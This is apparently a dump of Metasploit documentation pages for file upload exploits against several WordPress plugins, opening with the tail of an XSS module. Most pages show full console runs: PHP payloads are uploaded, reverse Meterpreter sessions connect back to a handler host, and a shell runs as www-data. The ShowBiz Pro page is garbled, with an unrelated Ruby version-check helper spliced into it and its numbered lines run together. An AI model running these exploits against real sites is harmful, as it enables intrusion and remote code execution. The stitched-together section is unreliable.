      print_good("#{peer} - Vulnerable to Cross-Site Scripting the Ultimate Social Media 1.1.1.11 plugin for WordPress")
      p = store_local(
        'wp_ultimate_social_media.http',
        'text/html',
        res.body,
        "#{xss}"
      )
      print_good("Save in: #{p}")
    else
      print_error("#{peer} - Failed, maybe the target isn't vulnerable.")
    end
  end
end

--------------------------------------------------------------------------------
/documentation/exploits/wp_showbizpro_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin ThemePunch Showbiz Pro Upload Vulnerability.
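Every module above gates on a version check before it does anything else: `check_plugin_version_from_readme('cp-image-store', '1.0.6')`, `check_plugin_version_from_readme('eshop', '6.3.14')`, `check_plugin_version_from_readme('ultimate-social-media-icons', '1.1.1.12')`, and the `check_version_from_custom_file(...)` calls in the WooCommerce Amazon Affiliates and ShowBiz Pro exploits. The following is an added, stand-alone Ruby example, not code from this repository or from the Metasploit WordPress mixin, that reimplements that gate in simplified form so the same "installed version below first fixed version" test can be run against a plugin inventory without the framework or the exploit. The helper names (`readme_version`, `custom_file_version`, `classify`, `audit_samples`), the readme regexes and all sample bodies are this example's own assumptions; the custom-file regex is the one the two exploit modules above pass in.

```ruby
# Added example (not part of this repository): simplified reimplementation of the
# version gate used by the modules' check methods. Parses a plugin version from
# a fetched body and compares it against the first fixed release with
# Gem::Version, so "1.1.1.11" < "1.1.1.12" and "6.3.13" < "6.3.14" compare
# numerically rather than as strings.
require 'rubygems' # Gem::Version (already loaded on modern Ruby; harmless)

# Assumed readme.txt headers: WordPress readmes carry "Stable tag:" and, less
# reliably, "Version:". Only digit/dot values are accepted as a version.
README_STABLE_TAG = /^\s*stable tag:\s*([\d.]+)/i
README_VERSION    = /^\s*version:\s*([\d.]+)/i

# The exact pattern the ShowBiz Pro and WooCommerce Amazon Affiliates modules
# pass to check_version_from_custom_file (first capture group = version).
CUSTOM_FILE_VERSION = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi

# Extract a version from a readme.txt body. A "Stable tag: trunk" does not
# match README_STABLE_TAG (no digits), so the lookup falls back to "Version:".
# Returns nil when no usable version is present.
def readme_version(body)
  m = body.match(README_STABLE_TAG) || body.match(README_VERSION)
  return nil unless m
  v = m[1]
  # Guard against malformed captures such as "1." that Gem::Version rejects.
  v =~ /\A\d+(\.\d+)*\z/ ? v : nil
end

# Extract a version from an arbitrary plugin file with a caller-supplied regex
# whose first capture group is the version (mirrors the custom-file checks).
def custom_file_version(body, regex)
  m = body.match(regex)
  m ? m[1] : nil
end

# :vulnerable when installed < fixed, :safe otherwise, :unknown when the
# version could not be determined (the modules report "unknown" in that case
# rather than guessing).
def classify(installed, fixed)
  return :unknown if installed.nil?
  Gem::Version.new(installed) < Gem::Version.new(fixed) ? :vulnerable : :safe
end

# Constructed sample bodies (not fetched from any site, not real plugin files).
SAMPLE_README = <<~README
  === eShop ===
  Contributors: example
  Requires at least: 3.0
  Tested up to: 4.3
  Stable tag: 6.3.13
README

SAMPLE_README_TRUNK = <<~README
  === Some Plugin ===
  Stable tag: trunk
  Version: 1.0.5
README

SAMPLE_RELEASE_LOG = <<~LOG
  Release log
  Version 1.7.1 (26.11.2015)
  - fixed update handling
LOG

# Run the same comparisons the modules above perform, on the constructed samples.
# Fixed versions are the ones the modules encode: eShop 6.3.14, CP Image Store
# 1.0.6, ShowBiz Pro 1.7.2.
def audit_samples
  {
    eshop:   classify(readme_version(SAMPLE_README), '6.3.14'),
    trunk:   classify(readme_version(SAMPLE_README_TRUNK), '1.0.6'),
    showbiz: classify(custom_file_version(SAMPLE_RELEASE_LOG, CUSTOM_FILE_VERSION), '1.7.2'),
    missing: classify(readme_version("no version headers here"), '1.0.0')
  }
end

if __FILE__ == $PROGRAM_NAME
  audit_samples.each { |plugin, verdict| puts "#{plugin}: #{verdict}" }
end
```

The design point worth keeping from the modules: an absent or unparsable version yields `:unknown`, never `:safe`, because a plugin that hides its readme (or whose release log has a different layout, as the ShowBiz `# TO DO` comment hints) is not evidence that it is patched.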
2 | 3 | Application: WordPress Plugin 'Showbiz Pro 1.7.1 4 | Homepage: http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988 5 | References: https://wpvulndb.com/vulnerabilities/7955 6 | 7 | #### Vulnerable packages* 8 | 9 | 1.7.1 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msf > use exploit/unix/webapp/wp_showbiz_file_upload 16 | msf exploit(wp_showbiz_file_upload) > show options 17 | 18 | Module options (exploit/unix/webapp/wp_showbiz_file_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 23 | RHOST yes The target address 24 | RPORT 80 yes The target port 25 | TARGETURI / yes The base path to the wordpress application 26 | VHOST no HTTP server virtual host 27 | 28 | 29 | Exploit target: 30 | 31 | Id Name 32 | -- ---- 33 | 0 ThemePunch Showbiz Pro (showbiz) 1.7.1 34 | 35 | 36 | msf exploit(wp_showbiz_file_upload) > info 37 | 38 | Name: WordPress ShowBiz Pro Upload Vulnerability 39 | Module: exploit/unix/webapp/wp_showbiz_file_upload 40 | Platform: PHP 41 | Privileged: No 42 | License: Metasploit Framework License (BSD) 43 | Rank: Excellent 44 | Disclosed: 2015-11-26 45 | 46 | Provided by: 47 | Simo Ben youssef 48 | Roberto Soares Espreto 49 | 50 | Available targets: 51 | Id Name 52 | -- ---- 53 | 0 ThemePunch Showbiz Pro (showbiz) 1.7.1 54 | 55 | Basic options: 56 | Name Current Setting Required Description 57 | ---- --------------- -------- ----------- 58 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
59 | RHOST yes The target address 60 | RPORT 80 yes The target port 61 | TARGETURI / yes The base path to the wordpress application 62 | VHOST no HTTP server virtual host 63 | 64 | Payload information: 65 | 66 | Description: 67 | This module exploits an arbitrary PHP code upload in the WordPress 68 | ThemePunch ShowBiz Pro plugin, version 1.7.1 and prior. The 69 | vulnerability allows for arbitrary file upload and remote code 70 | execution. 71 | 72 | References: 73 | https://www.exploit-db.com/exploits/35385 74 | https://wpvulndb.com/vulnerabilities/7955 75 | http://www.osvdb.org/115118 76 | https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability 77 | 78 | msf exploit(wp_showbiz_file_upload) > set RHOST 192.168.1.31 79 | RHOST => 192.168.1.31 80 | msf exploit(wp_showbiz_file_upload) > exploit 81 | 82 | [*] Started reverse handler on 192.168.1.37:4444 83 | [+] 192.168.1.31:80 - Our payload is: rKgM.php 84 | [*] 192.168.1.31:80 - Calling payload... 85 | [*] Sending stage (40499 bytes) to 192.168.1.31 86 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:52046) at 2015-05-06 03:41:20 -0300 87 | [+] Deleted rKgM.php 88 | [+] Deleted ../showbiz.zip 89 | 90 | meterpreter > sysinfo 91 | Computer : msfdevel 92 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 22492 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /documentation/exploits/wp_inboundio_marketing_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin InBoundio Marketing File Upload Vulnerability. 

Application: WordPress Plugin 'InBoundio Marketing' 2.0
Homepage: https://wordpress.org/plugins/inboundio-marketing/
Source Code: https://downloads.wordpress.org/plugin/inboundio-marketing.2.0.zip
References: https://wpvulndb.com/vulnerabilities/7864

#### Vulnerable packages*

2.0

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_inboundio_marketing_file_upload
msf exploit(wp_inboundio_marketing_file_upload) > show options

Module options (exploit/unix/webapp/wp_inboundio_marketing_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   InBoundio Marketing 2.0


msf exploit(wp_inboundio_marketing_file_upload) > info

       Name: WordPress InBoundio Marketing Upload Vulnerability
     Module: exploit/unix/webapp/wp_inboundio_marketing_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-03-24

Provided by:
  KedAns-Dz
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   InBoundio Marketing 2.0

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  InBoundio Marketing version 2.0. The vulnerability allows for
  arbitrary file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/36478
  http://www.osvdb.org/119890
  https://wpvulndb.com/vulnerabilities/7864

msf exploit(wp_inboundio_marketing_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_inboundio_marketing_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[+] 192.168.1.31:80 - Our payload is at: yNwDcuwRwxdCM.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:50526) at 2015-04-23 03:22:04 -0300
[+] Deleted yNwDcuwRwxdCM.php


meterpreter >
meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 28010 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/exploits/wp_wpshop_ecommerce_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress WPshop eCommerce File Upload Vulnerability.

Application: WordPress Plugin 'WPshop eCommerce' 1.3.9.5
Homepage: https://wordpress.org/plugins/wpshop/
Source Code: https://downloads.wordpress.org/plugin/wpshop.1.3.9.5.zip
Active Installs: 1,000+
References: https://wpvulndb.com/vulnerabilities/7830

#### Vulnerable packages*

1.3.9.5

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_wpshop_ecommerce_file_upload
msf exploit(wp_wpshop_ecommerce_file_upload) > show options

Module options (exploit/unix/webapp/wp_wpshop_ecommerce_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WPshop eCommerce 1.3.9.5


msf exploit(wp_wpshop_ecommerce_file_upload) > info

       Name: WordPress WPshop eCommerce Upload Vulnerability
     Module: exploit/unix/webapp/wp_wpshop_ecommerce_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-03-09

Provided by:
  g0blin
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WPshop eCommerce 1.3.9.5

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  WPshop eCommerce plugin, version 1.3.9.5. The vulnerability allows
  for arbitrary file upload and remote code execution.

References:
  https://wpvulndb.com/vulnerabilities/7830
  https://research.g0blin.co.uk/g0blin-00036/

msf exploit(wp_wpshop_ecommerce_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_wpshop_ecommerce_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_wpshop_ecommerce_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[+] 192.168.1.31:80 - Our payload is at: jKjs.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 2 opened (192.168.1.37:4444 -> 192.168.1.31:51030) at 2015-04-24 06:16:12 -0300
[+] Deleted jKjs.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 2240 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

--------------------------------------------------------------------------------
/documentation/exploits/wp_xerteonline_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Xerte Online Upload Vulnerability.

Application: WordPress Plugin 'Xerte Online' 0.32
Homepage: https://wordpress.org/plugins/xerte-online/
Source Code: http://downloads.wordpress.org/plugin/xerte-online.0.32.zip
References: https://wpvulndb.com/vulnerabilities/6102

#### Vulnerable packages*

0.32

#### Usage:

##### Linux (Ubuntu 14.04.2 LTS):
```
msf > use exploit/unix/webapp/wp_xerteonline_file_upload
msf exploit(wp_xerteonline_file_upload) > info

       Name: WordPress Xerte Online Upload Vulnerability
     Module: exploit/unix/webapp/wp_xerteonline_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-12-30

Provided by:
  Sammy
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   Xerte Online 0.32

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  Xerte Online plugin, version 0.32. The vulnerability allows for
  arbitrary file upload and remote code execution.

References:
  https://wpvulndb.com/vulnerabilities/6102
  http://www.opensyscom.fr/Actualites/wordpress-plugins-xerte-online-arbitrary-file-upload-vulnerability.html
  http://packetstormsecurity.com/files/119220/

msf exploit(wp_xerteonline_file_upload) > show options

Module options (exploit/unix/webapp/wp_xerteonline_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Xerte Online 0.32


msf exploit(wp_xerteonline_file_upload) > set RHOST 192.168.1.38
RHOST => 192.168.1.38
msf exploit(wp_xerteonline_file_upload) > check
[*] 192.168.1.38:80 - The target appears to be vulnerable.
msf exploit(wp_xerteonline_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[+] 192.168.1.38:80 - Our payload is at: AeIaW.php. Calling payload...
[*] 192.168.1.38:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.38
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.38:53927) at 2015-05-13 02:17:28 -0300
[+] Deleted AeIaW.php

meterpreter > sysinfo
Computer    : devel
OS          : Linux devel 3.16.0-37-generic #51~14.04.1-Ubuntu SMP Wed May 6 15:23:14 UTC 2015 x86_64
Meterpreter : php/php
meterpreter > shell
Process 22147 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/exploits/wp_nmediawebsite_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress N-Media Website Contact Form 1.3.4 Shell Upload.

Application: WordPress N-Media Website Contact Form
Homepage: https://wordpress.org/plugins/website-contact-form-with-file-upload
Source Code: https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
Active Installs (wordpress.org): 1,000+
References: https://wpvulndb.com/vulnerabilities/7896

#### Vulnerable packages*

1.3.4

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload
msf exploit(wp_nmediawebsite_file_upload) > show options

Module options (exploit/unix/webapp/wp_nmediawebsite_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   N-Media WebSite Contact Form 1.3.4


msf exploit(wp_nmediawebsite_file_upload) > info

       Name: WordPress N-Media Website Contact Form Upload Vulnerability
     Module: exploit/unix/webapp/wp_nmediawebsite_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-12

Provided by:
  Claudio Viviani
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   N-Media WebSite Contact Form 1.3.4

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  N-Media Website Contact Form plugin, version 1.3.4. The
  vulnerability allows for arbitrary file upload and remote code
  execution.

References:
  http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/
  https://wpvulndb.com/vulnerabilities/7896

msf exploit(wp_nmediawebsite_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_nmediawebsite_file_upload) > exploit

[*] Started reverse handler on 192.168.1.46:4444
[+] 192.168.1.31:80 - Our payload is at: 1428976681-oevRlIo.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40674) at 2015-04-13 22:57:39 -0300
[+] Deleted 1428976681-oevRlIo.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 25091 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


```

--------------------------------------------------------------------------------
/documentation/exploits/wp_woopra_analytics_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Woopra Analytics File Upload Vulnerability.

Application: WordPress Plugin 'Woopra Analytics' 1.4.3.1
Homepage: https://wordpress.org/plugins/woopra
Source Code: https://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
Active Installs: 8,000+
References: https://wpvulndb.com/vulnerabilities/6903

#### Vulnerable packages*

1.4.3.1

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_woopra_analytics_file_upload
msf exploit(wp_woopra_analytics_file_upload) > show options

Module options (exploit/unix/webapp/wp_woopra_analytics_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP Woopra Analytics 1.4.3.1


msf exploit(wp_woopra_analytics_file_upload) > info

       Name: WordPress Woopra Analytics File Upload
     Module: exploit/unix/webapp/wp_woopra_analytics_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-06

Provided by:
  wantexz
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WP Woopra Analytics 1.4.3.1

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress Woopra Analytics plugin contains an file upload
  vulnerability. We can upload arbitrary files to the upload folder,
  because the plugin also uses it's own file upload mechanism instead
  of the wordpress api it's possible to upload any file type.

References:
  https://wpvulndb.com/vulnerabilities/6903
  http://packetstormsecurity.com/files/123525/

msf exploit(wp_woopra_analytics_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_woopra_analytics_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_woopra_analytics_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file hmbyyz.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:47928) at 2015-04-27 00:15:32 -0300
[+] Deleted hmbyyz.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 3706 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/exploits/wp_business_intelligence_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin WP Business Intelligence Lite File Read Vulnerability.

Application: WordPress Plugin 'WP Business Intelligence Lite' 1.0.6
Homepage: https://wordpress.org/plugins/wp-business-intelligence-lite/
Source Code: https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.0.6.zip
References: https://wpvulndb.com/vulnerabilities/7200

#### Vulnerable packages*

1.0.6

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_business_intelligence_file_upload
msf exploit(wp_business_intelligence_file_upload) > show options

Module options (exploit/unix/webapp/wp_business_intelligence_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP Business Intelligence Lite 1.0.6


msf exploit(wp_business_intelligence_file_upload) > info

       Name: WordPress Business Intelligence Lite File Upload
     Module: exploit/unix/webapp/wp_business_intelligence_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-03-31

Provided by:
  Manish Kishan Tanwar
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WP Business Intelligence lite 1.0.6

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress Business Intelligence Lite plugin contains an file
  upload vulnerability. We can upload arbitrary files to the upload
  folder, because the plugin also uses it's own file upload mechanism
  instead of the wordpress api it's possible to upload any file type.

References:
  https://wpvulndb.com/vulnerabilities/7200
  http://packetstormsecurity.com/files/125927/

msf exploit(wp_business_intelligence_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_business_intelligence_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_business_intelligence_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file xrhzqm.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51984) at 2015-04-26 01:21:09 -0300
[+] Deleted xrhzqm.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 11005 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

--------------------------------------------------------------------------------
/documentation/exploits/wp_frontend_editor_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Front-end Editor File Upload Vulnerability.

Application: WordPress Plugin 'Front-end Editor' 2.2.1
Homepage: https://wordpress.org/plugins/front-end-editor
Source Code: http://downloads.wordpress.org/plugin/front-end-editor.2.2.1.zip
Active Installs (wordpress.org): 10,000+
References: https://wpvulndb.com/vulnerabilities/7569

#### Vulnerable packages*

2.2.1

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_frontend_editor_file_upload
msf exploit(wp_frontend_editor_file_upload) > show options

Module options (exploit/unix/webapp/wp_frontend_editor_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Front-End Editor 2.2.1


msf exploit(wp_frontend_editor_file_upload) > info

       Name: WordPress Front-end Editor File Upload
     Module: exploit/unix/webapp/wp_frontend_editor_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-07-04

Provided by:
  Sammy
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   Front-End Editor 2.2.1

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress Front-end Editor plugin contains an authenticated file
  upload vulnerability. We can upload arbitrary files to the upload
  folder, because the plugin also uses it's own file upload mechanism
  instead of the wordpress api it's possible to upload any file type.

References:
  http://www.osvdb.org/83637
  https://wpvulndb.com/vulnerabilities/7569
  http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html

msf exploit(wp_frontend_editor_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_frontend_editor_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_frontend_editor_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file kgdmn.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51677) at 2015-04-25 21:57:59 -0300
[+] Deleted kgdmn.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 9646 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/exploits/wp_ultimate_product_catalogue_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress Ultimate Product Catalogue File Upload Vulnerability.

Application: WordPress Plugin 'Ultimate Product Catalogue' 3.1.1
Homepage: https://wordpress.org/plugins/ultimate-product-catalogue
Source Code: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.1.zip
Active Installs: 4,000+
References: https://wpvulndb.com/vulnerabilities/7939

#### Vulnerable packages*

3.1.1

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload
msf exploit(wp_ultimate_product_catalogue_file_upload) > show options

Module options (exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP Ultimate Product Caatalogue 3.1.1


msf exploit(wp_ultimate_product_catalogue_file_upload) > info

       Name: WordPress Ultimate Product Catalogue Upload Vulnerability
     Module: exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-22

Provided by:
  Luca Ercoli
  Roberto Soares Espreto

